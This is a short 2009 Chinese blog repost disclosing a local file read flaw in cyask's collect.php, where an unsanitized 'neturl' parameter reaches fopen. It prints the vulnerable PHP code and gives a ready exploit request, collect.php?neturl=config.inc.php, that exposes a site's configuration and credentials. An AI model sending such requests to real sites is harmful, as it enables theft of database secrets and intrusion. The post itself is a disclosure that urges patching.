cyask的一个本地读文件的漏洞利用

2009/7/12 来源:www.arpun.com 作者:小白

昨天在晚上看到了一个这样的文章, 却没有人说利用的方法, 自己研究了一下, 原来这么简单。

下面是这篇文章的内容。

下午帮同事看一个站, DZ的论坛, 该补的都补了, 咱也没圈day

然后逛了下有个仿百度知道的程序在上面, 和DZ整合了, 原以为也是Dz开发的, 估计也没啥问题

下来看代码, 看到collect.php

——————————-

PHP代码

else  

{   

/*  

检查网址  

*/  

$url=get_referer();   

$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);   

  

$collect_url=emptyempty($neturl) ? $url : $neturl;   

  

$contents = ”;   

if($fid=@fopen($collect_url,”r“))   

{   

do  

{   

$data = fread($fid, 4096);   

if (strlen($data) == 0)   

{   

break;   

}   

$contents .= $data;   

}   

while(true);   

fclose($fid);   

}   

else  

{   

show_message(’collect_url_error’, ”);   

exit;   

}  

———————————-

害人啊, 本来还挺安全的一个站, 整合个毛呃……

找一个cyask的网站, 在其上面注册, 然后登录后, 输入http://www.×××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键, 点查看源文件, 哇, 什么都看到了, 我只是说出来利用方法, 希望大家尽早补漏洞。 一切损失与本人无关哦!

网友评论
评论(...
全部评论